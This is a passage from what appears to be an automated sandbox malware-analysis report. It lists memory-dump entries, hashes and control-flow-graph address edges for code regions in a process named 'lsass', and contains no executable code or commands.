                                        • Opcode Fuzzy Hash: 6a50d26688d0c82a4e25f5763308ffc4608d3aeecc20f0c39b0d31bb84f1e21d
                                        • Instruction Fuzzy Hash: A931A27190CA4C8FDB18DF5898456F9BBF1FB69311F00426FD049D3292DB74A846CB81

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: da3909b87ac7a59861d1979320459f221cf6cd67413d8f51ef09d0f8e826ed7c
                                        • Instruction ID: 69c34722227bf5e04ba7e45050b7804ef1c02a624e1115e6a677b8b327eb18be
                                        • Opcode Fuzzy Hash: da3909b87ac7a59861d1979320459f221cf6cd67413d8f51ef09d0f8e826ed7c
                                        • Instruction Fuzzy Hash: 4B516EB2E0A54E8FDB68DFA8C4645BDB7B1FF44304F1141BAD01AD72D6CA342A05CB41

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
                                        • Instruction ID: 5fb0d2af20f350d9d902e3ba63b99c8e4c68ea58e36d34718a641ec8abea3f51
                                        • Opcode Fuzzy Hash: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
                                        • Instruction Fuzzy Hash: FF412B71E0960E9FDB5ADF94C4A15BDBBB5FF48304F1140BAD01AA72A6CB396A01CB10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 121 7ffd9bb1684b-7ffd9bb16875 124 7ffd9bb169a7-7ffd9bb169d4 121->124 125 7ffd9bb1687b-7ffd9bb168e7 121->125 134 7ffd9bb168ef-7ffd9bb168fa 125->134 134->125 135 7ffd9bb16900 134->135 135->124
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: G_
                                        • API String ID: 0-87394136
                                        • Opcode ID: b7387dcf73440738cddaf99efeeeef2b81fdebf04aa961b9221680865f7b753c
                                        • Instruction ID: fbdf7dcf94e6e65f6be4b2599afeac20ac4e2e1025a1d2b9880c1b81b86118e3
                                        • Opcode Fuzzy Hash: b7387dcf73440738cddaf99efeeeef2b81fdebf04aa961b9221680865f7b753c
                                        • Instruction Fuzzy Hash: DB314C71B1990E8FDB58DEA8D4615B8B3A2FF58314F114139E15ED32A5CF247C12CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 138 7ffd9bb190a1 139 7ffd9bb190a6-7ffd9bb190ae 138->139 140 7ffd9bb19231-7ffd9bb19245 139->140 141 7ffd9bb190b4-7ffd9bb190c6 call 7ffd9bb18a70 139->141 142 7ffd9bb19247 140->142 143 7ffd9bb1924c-7ffd9bb19257 140->143 146 7ffd9bb19095-7ffd9bb1909c 141->146 147 7ffd9bb190c8-7ffd9bb190cd 141->147 142->143 148 7ffd9bb19270-7ffd9bb19275 146->148 149 7ffd9bb190ef-7ffd9bb19100 147->149 150 7ffd9bb190cf-7ffd9bb190d3 147->150 148->138 153 7ffd9bb19106-7ffd9bb1911b 149->153 154 7ffd9bb1927a-7ffd9bb19295 149->154 151 7ffd9bb191d3-7ffd9bb191e4 150->151 152 7ffd9bb190d9-7ffd9bb190ea 150->152 156 7ffd9bb191e6 151->156 157 7ffd9bb191eb-7ffd9bb191f6 151->157 152->140 153->154 155 7ffd9bb19121-7ffd9bb1912d 153->155 163 7ffd9bb1929d 154->163 164 7ffd9bb19297 154->164 158 7ffd9bb1915e-7ffd9bb19174 call 7ffd9bb18a70 155->158 159 7ffd9bb1912f-7ffd9bb19146 call 7ffd9bb17580 155->159 156->157 158->151 170 7ffd9bb19176-7ffd9bb19181 158->170 159->151 169 7ffd9bb1914c-7ffd9bb1915b call 7ffd9bb176b0 159->169 165 7ffd9bb1929f 163->165 166 7ffd9bb192a1 163->166 164->163 165->166 169->158 170->154 172 7ffd9bb19187-7ffd9bb1919c 170->172 172->154 174 7ffd9bb191a2-7ffd9bb191b5 172->174 175 7ffd9bb191b7-7ffd9bb191d1 call 7ffd9bb17580 174->175 176 7ffd9bb19209-7ffd9bb19211 174->176 175->151 180 7ffd9bb191f7-7ffd9bb19206 call 7ffd9bb176b0 175->180 178 7ffd9bb19219-7ffd9bb1921c 176->178 181 7ffd9bb19223-7ffd9bb1922b 178->181 180->176 181->140 182 7ffd9bb1906a-7ffd9bb19077 181->182 182->181 185 7ffd9bb1907d-7ffd9bb19091 182->185 185->181
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: caa4f9982dd26f8a7338f5059a55138eb9dba22427f1c53dce3304ea64b1b474
                                        • Instruction ID: fcfb9332560b6868578c30014a6173241ae4eacce6d480fc4f63c711890aa0e6
                                        • Opcode Fuzzy Hash: caa4f9982dd26f8a7338f5059a55138eb9dba22427f1c53dce3304ea64b1b474
                                        • Instruction Fuzzy Hash: 7951C230A0AB4A8FD368DF54C5A867173E1FF05308B51593DC48EC3AE6CB25B942CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 186 7ffd9bb15d5d-7ffd9bb15d5f 187 7ffd9bb15dbe-7ffd9bb15df1 186->187 188 7ffd9bb15d61-7ffd9bb163cb 186->188 192 7ffd9bb15e8a-7ffd9bb15e92 187->192 199 7ffd9bb163fa-7ffd9bb16410 188->199 194 7ffd9bb15df6-7ffd9bb15dff 192->194 195 7ffd9bb15e98 192->195 198 7ffd9bb15e05-7ffd9bb15e10 194->198 194->199 197 7ffd9bb15ea2-7ffd9bb15ebf 195->197 204 7ffd9bb15ec6-7ffd9bb15ed7 197->204 200 7ffd9bb15e16-7ffd9bb15e2a 198->200 201 7ffd9bb15e9a-7ffd9bb15e9e 198->201 209 7ffd9bb16412-7ffd9bb16436 199->209 210 7ffd9bb1645a-7ffd9bb1646d 199->210 205 7ffd9bb15e83-7ffd9bb15e87 200->205 206 7ffd9bb15e2c-7ffd9bb15e43 200->206 201->197 214 7ffd9bb15ef0-7ffd9bb15eff 204->214 215 7ffd9bb15ed9-7ffd9bb15eee 204->215 205->192 206->199 208 7ffd9bb15e49-7ffd9bb15e55 206->208 212 7ffd9bb15e6f-7ffd9bb15e80 208->212 213 7ffd9bb15e57-7ffd9bb15e6b 208->213 212->205 213->206 216 7ffd9bb15e6d 213->216 219 7ffd9bb15f21-7ffd9bb15f8e 214->219 220 7ffd9bb15f01-7ffd9bb15f1c 214->220 215->214 216->205 230 7ffd9bb15fdf-7ffd9bb16026 219->230 231 7ffd9bb15f90-7ffd9bb15fa3 219->231 227 7ffd9bb16359-7ffd9bb1638a 220->227 235 7ffd9bb1638c-7ffd9bb16396 227->235 242 7ffd9bb1602a-7ffd9bb1602b 230->242 231->199 233 7ffd9bb15fa9-7ffd9bb15fd7 231->233 243 7ffd9bb15fd8-7ffd9bb15fdd 233->243 238 7ffd9bb15da0-7ffd9bb15db0 235->238 239 7ffd9bb1639c-7ffd9bb163ae 235->239 238->199 241 7ffd9bb15db6-7ffd9bb15dbd 238->241 241->187 244 7ffd9bb1602d-7ffd9bb1604b 242->244 245 7ffd9bb1608a 242->245 243->231 246 7ffd9bb15fde 243->246 257 7ffd9bb1604d-7ffd9bb16051 244->257 258 7ffd9bb160bc-7ffd9bb160cd 244->258 247 7ffd9bb1609c 245->247 248 7ffd9bb1608c-7ffd9bb1608d 245->248 246->230 251 7ffd9bb1609d 247->251 252 7ffd9bb16118-7ffd9bb16123 247->252 249 7ffd9bb1608f-7ffd9bb1609b 248->249 250 7ffd9bb160d7-7ffd9bb160db 248->250 249->247 254 7ffd9bb160dd-7ffd9bb160df 250->254 255 7ffd9bb1610e-7ffd9bb16116 251->255 256 7ffd9bb1609e-7ffd9bb160a3 251->256 260 7ffd9bb16129-7ffd9bb16131 252->260 259 7ffd9bb160e1-7ffd9bb160ef 254->259 254->260 255->252 256->242 269 7ffd9bb160a5 256->269 257->243 264 7ffd9bb16053 257->264 262 7ffd9bb160ce-7ffd9bb160d1 258->262 265 7ffd9bb16160-7ffd9bb16175 259->265 266 7ffd9bb160f1-7ffd9bb160f5 259->266 267 7ffd9bb16133-7ffd9bb1613c 260->267 268 7ffd9bb1617b-7ffd9bb16183 260->268 262->250 270 7ffd9bb1607c-7ffd9bb16089 264->270 265->268 266->270 275 7ffd9bb160f7 266->275 274 7ffd9bb1613f-7ffd9bb16141 267->274 272 7ffd9bb16189-7ffd9bb161a2 268->272 273 7ffd9bb1620b-7ffd9bb16219 268->273 269->258 270->245 272->273 276 7ffd9bb161a4-7ffd9bb161a5 272->276 277 7ffd9bb1628a-7ffd9bb1628b 273->277 278 7ffd9bb1621b-7ffd9bb1621d 273->278 279 7ffd9bb161b2-7ffd9bb161b4 274->279 280 7ffd9bb16143-7ffd9bb16145 274->280 275->255 283 7ffd9bb161a6-7ffd9bb161b0 276->283 282 7ffd9bb162bb-7ffd9bb162bd 277->282 284 7ffd9bb1621f 278->284 285 7ffd9bb16299-7ffd9bb1629b 278->285 292 7ffd9bb161b5-7ffd9bb161b7 279->292 287 7ffd9bb161c1-7ffd9bb161c5 280->287 288 7ffd9bb16147 280->288 294 7ffd9bb1632e-7ffd9bb16357 282->294 295 7ffd9bb162bf 282->295 283->279 284->283 291 7ffd9bb16221 284->291 289 7ffd9bb1629d-7ffd9bb1629f 285->289 290 7ffd9bb1630c 285->290 296 7ffd9bb16241-7ffd9bb1625b 287->296 297 7ffd9bb161c7 287->297 288->262 293 7ffd9bb16149 288->293 303 7ffd9bb162a1 289->303 304 7ffd9bb1631b-7ffd9bb1631f 289->304 301 7ffd9bb1637d-7ffd9bb1638a 290->301 302 7ffd9bb1630e-7ffd9bb16310 290->302 305 7ffd9bb16228-7ffd9bb1622c 291->305 316 7ffd9bb16238-7ffd9bb16240 292->316 317 7ffd9bb161b8 292->317 299 7ffd9bb1614e-7ffd9bb16154 293->299 294->227 298 7ffd9bb162dc-7ffd9bb162ea 295->298 325 7ffd9bb1628d-7ffd9bb16296 296->325 326 7ffd9bb1625d-7ffd9bb1626b 296->326 297->299 300 7ffd9bb161c9 297->300 308 7ffd9bb162eb-7ffd9bb162f5 298->308 309 7ffd9bb161d0-7ffd9bb161f5 299->309 324 7ffd9bb16156 299->324 300->309 301->235 302->235 310 7ffd9bb16312 302->310 303->305 311 7ffd9bb162a3 303->311 312 7ffd9bb16321 304->312 313 7ffd9bb1639b 304->313 314 7ffd9bb1622e 305->314 315 7ffd9bb162a8-7ffd9bb162ae 305->315 320 7ffd9bb162f7-7ffd9bb1630a 308->320 336 7ffd9bb161f8-7ffd9bb16209 309->336 310->285 321 7ffd9bb16314 310->321 311->315 312->315 322 7ffd9bb16323 312->322 313->239 314->292 323 7ffd9bb16230 314->323 333 7ffd9bb1632a-7ffd9bb1632d 315->333 334 7ffd9bb162b0 315->334 316->296 317->274 329 7ffd9bb161b9-7ffd9bb161ba 317->329 320->290 321->304 322->333 323->316 324->254 330 7ffd9bb16158 324->330 325->285 326->298 331 7ffd9bb1626d-7ffd9bb1626f 326->331 329->287 330->265 331->308 337 7ffd9bb16271 331->337 333->294 334->320 338 7ffd9bb162b2-7ffd9bb162ba 334->338 336->273 336->276 337->336 339 7ffd9bb16273 337->339 338->282 339->277
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 031edd2a0655d65a6e0a1ce5f8f7884764f5e0e7bcc9a2b1d527fd556f63b932
                                        • Instruction ID: 83b3c7e2937478ad38ee5aaca39b7413f916c6d02c9ba69e3e177c5516f0324b
                                        • Opcode Fuzzy Hash: 031edd2a0655d65a6e0a1ce5f8f7884764f5e0e7bcc9a2b1d527fd556f63b932
                                        • Instruction Fuzzy Hash: 9732A230B09A0D8FDBA8DF58C8A5A6873E2FF58314F5151B9D40EC72E6DE24AD45CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 340 7ffd9bea1247-7ffd9bea14bb 357 7ffd9bea14c8-7ffd9bea14d1 340->357 358 7ffd9bea14a1-7ffd9bea14c6 340->358 366 7ffd9bea14ae-7ffd9bea14b4 357->366
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
                                        • Instruction ID: 19a5cddcba63515e5fa6ef3dd101043ea8956d888ccbec207ad8fb4dcb397c73
                                        • Opcode Fuzzy Hash: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
                                        • Instruction Fuzzy Hash: 9E21E892F0F1AB86F67555ED24310FC6B4C6F46334F1A06B6D49D850E2DC0E2681D293

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 368 7ffd9bb17912-7ffd9bb17919 369 7ffd9bb1791f-7ffd9bb17951 call 7ffd9bb176b0 call 7ffd9bb17580 368->369 370 7ffd9bb17b35-7ffd9bb17b46 368->370 369->370 377 7ffd9bb17957-7ffd9bb179a9 call 7ffd9bb176b0 call 7ffd9bb17580 369->377 371 7ffd9bb17b4d-7ffd9bb17b58 370->371 372 7ffd9bb17b48 370->372 372->371 377->370 384 7ffd9bb179af-7ffd9bb179f4 call 7ffd9bb176b0 377->384 390 7ffd9bb17a64-7ffd9bb17aa0 384->390 391 7ffd9bb179f6-7ffd9bb17a0a call 7ffd9bb17580 384->391 402 7ffd9bb17ad9-7ffd9bb17ade 390->402 391->370 395 7ffd9bb17a10-7ffd9bb17a33 call 7ffd9bb176b0 391->395 400 7ffd9bb17c05-7ffd9bb17c2d 395->400 401 7ffd9bb17a39-7ffd9bb17a49 395->401 410 7ffd9bb17c2f 400->410 411 7ffd9bb17c35 400->411 401->400 403 7ffd9bb17a4f-7ffd9bb17a62 401->403 404 7ffd9bb17ae5-7ffd9bb17aea 402->404 403->390 403->391 406 7ffd9bb17aa2-7ffd9bb17ac2 404->406 407 7ffd9bb17aec-7ffd9bb17aee 404->407 406->400 412 7ffd9bb17ac8-7ffd9bb17ad3 406->412 407->370 409 7ffd9bb17af0-7ffd9bb17af3 407->409 414 7ffd9bb17af5 409->414 415 7ffd9bb17af9-7ffd9bb17b14 409->415 410->411 416 7ffd9bb17c37 411->416 417 7ffd9bb17c39-7ffd9bb17c4a 411->417 412->402 413 7ffd9bb17bbb-7ffd9bb17bcf 412->413 418 7ffd9bb17bd1 413->418 419 7ffd9bb17bd6-7ffd9bb17be1 413->419 414->415 415->400 420 7ffd9bb17b1a-7ffd9bb17b33 call 7ffd9bb17580 415->420 416->417 421 7ffd9bb17c79-7ffd9bb17eba 416->421 418->419 420->370 426 7ffd9bb17b59-7ffd9bb17b72 call 7ffd9bb176b0 420->426 426->400 429 7ffd9bb17b78-7ffd9bb17b7f 426->429 430 7ffd9bb17ba9-7ffd9bb17bb1 429->430 431 7ffd9bb17b81-7ffd9bb17b9d 430->431 432 7ffd9bb17bb3-7ffd9bb17bb9 430->432 431->400 433 7ffd9bb17b9f-7ffd9bb17ba7 431->433 432->413 434 7ffd9bb17be2 432->434 433->430 434->400
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86d00639f5a45cb88c7c85d8e551c93acae688d6655b253809f773da7ed71f94
                                        • Instruction ID: ff9926d6174264ad1bde286aad2a60fe80ac177c65dd6cd9df906dd30519e387
                                        • Opcode Fuzzy Hash: 86d00639f5a45cb88c7c85d8e551c93acae688d6655b253809f773da7ed71f94
                                        • Instruction Fuzzy Hash: 94B1F3B1B1AA4A8FD359DF69C0A06A4B7A0FF19308F555179C04EC7AD6CB28F951CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 435 7ffd9bea3fcf-7ffd9bea3fe2 436 7ffd9bea402e-7ffd9bea4044 435->436 437 7ffd9bea3fe4-7ffd9bea4325 435->437 439 7ffd9bea404a-7ffd9bea4052 436->439 440 7ffd9bea40d4-7ffd9bea4104 436->440 442 7ffd9bea4058-7ffd9bea406a 439->442 443 7ffd9bea432f-7ffd9bea435a 439->443 450 7ffd9bea410a-7ffd9bea410b 440->450 451 7ffd9bea41ae-7ffd9bea41b7 440->451 442->443 444 7ffd9bea4070-7ffd9bea4087 442->444 445 7ffd9bea40c7-7ffd9bea40ce 444->445 446 7ffd9bea4089-7ffd9bea4090 444->446 445->439 445->440 446->443 449 7ffd9bea4096-7ffd9bea40c4 446->449 449->445 454 7ffd9bea410e-7ffd9bea4124 450->454 452 7ffd9bea41bd-7ffd9bea41c3 451->452 453 7ffd9bea42ef-7ffd9bea4315 451->453 452->443 455 7ffd9bea41c9-7ffd9bea41d8 452->455 454->443 456 7ffd9bea412a-7ffd9bea414e 454->456 457 7ffd9bea41de-7ffd9bea41e5 455->457 458 7ffd9bea42e2-7ffd9bea42e9 455->458 459 7ffd9bea4150-7ffd9bea4173 456->459 460 7ffd9bea41a1-7ffd9bea41a8 456->460 457->443 461 7ffd9bea41eb-7ffd9bea41f5 457->461 458->452 458->453 459->443 464 7ffd9bea4179-7ffd9bea419f 459->464 460->451 460->454 463 7ffd9bea41fc-7ffd9bea4207 461->463 465 7ffd9bea4246-7ffd9bea4255 463->465 466 7ffd9bea4209-7ffd9bea4220 463->466 464->459 464->460 465->443 467 7ffd9bea425b-7ffd9bea427f 465->467 466->443 468 7ffd9bea4226-7ffd9bea4242 466->468 469 7ffd9bea4282-7ffd9bea429f 467->469 468->466 470 7ffd9bea4244 468->470 469->443 471 7ffd9bea42a5-7ffd9bea42c0 469->471 472 7ffd9bea42c2-7ffd9bea42d8 470->472 471->469 471->472 472->443 473 7ffd9bea42da-7ffd9bea42de 472->473 473->458
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 658605edaa5d64137b896570f0ba86838e396e1ee74f975b408d90267e9a0fce
                                        • Instruction ID: 0ede4fbeb963d5ce3ad3450d6fb8c32c7d389e56e98b577175e3c1292d6971ee
                                        • Opcode Fuzzy Hash: 658605edaa5d64137b896570f0ba86838e396e1ee74f975b408d90267e9a0fce
                                        • Instruction Fuzzy Hash: 95B1DF706196058FEB5DCF48C0E15B53BB5FF48311B9042BCC84B8B69AD739E992CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 474 7ffd9bb1805f-7ffd9bb18072 475 7ffd9bb180be-7ffd9bb180d4 474->475 476 7ffd9bb18074-7ffd9bb183b5 474->476 478 7ffd9bb18164-7ffd9bb18194 475->478 479 7ffd9bb180da-7ffd9bb180e2 475->479 488 7ffd9bb1823e-7ffd9bb18247 478->488 489 7ffd9bb1819a-7ffd9bb1819b 478->489 480 7ffd9bb183bf-7ffd9bb183ea 479->480 481 7ffd9bb180e8-7ffd9bb180fa 479->481 481->480 483 7ffd9bb18100-7ffd9bb18117 481->483 486 7ffd9bb18157-7ffd9bb1815e 483->486 487 7ffd9bb18119-7ffd9bb18120 483->487 486->478 486->479 487->480 490 7ffd9bb18126-7ffd9bb18154 487->490 492 7ffd9bb1824d-7ffd9bb18253 488->492 493 7ffd9bb1837f-7ffd9bb183a5 488->493 491 7ffd9bb1819e-7ffd9bb181b4 489->491 490->486 491->480 494 7ffd9bb181ba-7ffd9bb181de 491->494 492->480 495 7ffd9bb18259-7ffd9bb18268 492->495 496 7ffd9bb181e0-7ffd9bb18203 494->496 497 7ffd9bb18231-7ffd9bb18238 494->497 498 7ffd9bb1826e-7ffd9bb18275 495->498 499 7ffd9bb18372-7ffd9bb18379 495->499 496->480 502 7ffd9bb18209-7ffd9bb1822f 496->502 497->488 497->491 498->480 500 7ffd9bb1827b-7ffd9bb18285 498->500 499->492 499->493 503 7ffd9bb1828c-7ffd9bb18297 500->503 502->496 502->497 504 7ffd9bb182d6-7ffd9bb182e5 503->504 505 7ffd9bb18299-7ffd9bb182b0 503->505 504->480 507 7ffd9bb182eb-7ffd9bb1830f 504->507 505->480 506 7ffd9bb182b6-7ffd9bb182d2 505->506 506->505 508 7ffd9bb182d4 506->508 509 7ffd9bb18312-7ffd9bb1832f 507->509 510 7ffd9bb18352-7ffd9bb18368 508->510 509->480 511 7ffd9bb18335-7ffd9bb18350 509->511 510->480 512 7ffd9bb1836a-7ffd9bb1836e 510->512 511->509 511->510 512->499
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a0ba962360f479c30b77b529823c511e13ec1bd2e863c29467913c0abc89e01
                                        • Instruction ID: abe5aa348e1cbd736392fae450cb28a0b859f633d8046382b38f904d18157b5e
                                        • Opcode Fuzzy Hash: 0a0ba962360f479c30b77b529823c511e13ec1bd2e863c29467913c0abc89e01
                                        • Instruction Fuzzy Hash: 36B1CF70619A098FEB5DCF08D4E06B137A1FF49314B5552BCD84A8B69BC738F992CB81

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32b32a479660b1f55723844002f23f786c1accce1101d2d3d37fcede18da1b82
                                        • Instruction ID: c5098af50d37399865b3d1776ccec4f3ad60bef2e2ba4879ee5cd6e099471f90
                                        • Opcode Fuzzy Hash: 32b32a479660b1f55723844002f23f786c1accce1101d2d3d37fcede18da1b82
                                        • Instruction Fuzzy Hash: 05819AB1B1EA4A4FE3398BE8996117577ECFF45300B12417ED08ED31A2DF2AB6428741
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4d69df1f706b157d256da3ff38fc5051ff2313d8c7980bf92bada0d1838e3f5
                                        • Instruction ID: 55be3f91dcdd3be4ce843035818c6ef057918398c7b4ada8ab8b4a795e043d2b
                                        • Opcode Fuzzy Hash: b4d69df1f706b157d256da3ff38fc5051ff2313d8c7980bf92bada0d1838e3f5
                                        • Instruction Fuzzy Hash: 55714BB4B0E58D4FE778DA5888669B437CCFF55310B0502B9D09ED3573DA1AAE0AC782
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74aad38c865a7702ec761b4767b9ff13756c2fb07b4faf6b6b40da39ee3a4f0b
                                        • Instruction ID: e271f0e8967be1082c05d634a691836580102fee35824a30b50f0661ffd4514b
                                        • Opcode Fuzzy Hash: 74aad38c865a7702ec761b4767b9ff13756c2fb07b4faf6b6b40da39ee3a4f0b
                                        • Instruction Fuzzy Hash: B9711431A0E54E8FE778DE98886A5B837C0FF44314B1612B9D45EC75F2DE18AA1A87C1
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dccfd4ca8fdc1af3c99d81cc02555904fb5fec18da3ff312d0d55c74ab27240
                                        • Instruction ID: b3a72f9974cbfb8913d40af666af668c651ccf9c67636c3fd0a8dd6ea1038e36
                                        • Opcode Fuzzy Hash: 5dccfd4ca8fdc1af3c99d81cc02555904fb5fec18da3ff312d0d55c74ab27240
                                        • Instruction Fuzzy Hash: 55712832B1D60A8FE3389E9894655B973E1FF45318F12157ED48FC36E2DE29BA028741
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1483699c16ab050185276a7b521f403110958d8bf7332933be4457f0d50ae056
                                        • Instruction ID: f048ac92b2362902376c1880b509e23043b87b76c192dd37733236870a852fc9
                                        • Opcode Fuzzy Hash: 1483699c16ab050185276a7b521f403110958d8bf7332933be4457f0d50ae056
                                        • Instruction Fuzzy Hash: 4581CFB06156058FEB1CCF48D0E15B53BB5FF58315B9142BCC84B8B68ADB39E992CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7dd31fcdead74af660fe794e82fbce5d8fd2968d9491983c17c02136fd5689d5
                                        • Instruction ID: aec023a8fd2fd93f3c49b9da853f337bbda8e0faa6e849149889fb26ee668d60
                                        • Opcode Fuzzy Hash: 7dd31fcdead74af660fe794e82fbce5d8fd2968d9491983c17c02136fd5689d5
                                        • Instruction Fuzzy Hash: 1F819070615A058FEB1CCF48D4E06B537A1FF49318B5556BCD84A8B69ECB38F992CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f2e4a6d5fac853babbb4fed1c4ae83099819e5c79248b95b88c2f34c0284cb5
                                        • Instruction ID: dba5bb3b03f1706f69dc1be1b1b1623c46e9a4786e934b72d20df28b9aa809c5
                                        • Opcode Fuzzy Hash: 3f2e4a6d5fac853babbb4fed1c4ae83099819e5c79248b95b88c2f34c0284cb5
                                        • Instruction Fuzzy Hash: B4613670A0EA4A8FD35ADFA8D4A05B4B7A4FF15300B1541BAC44EC7AE7DB29BD51C780
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
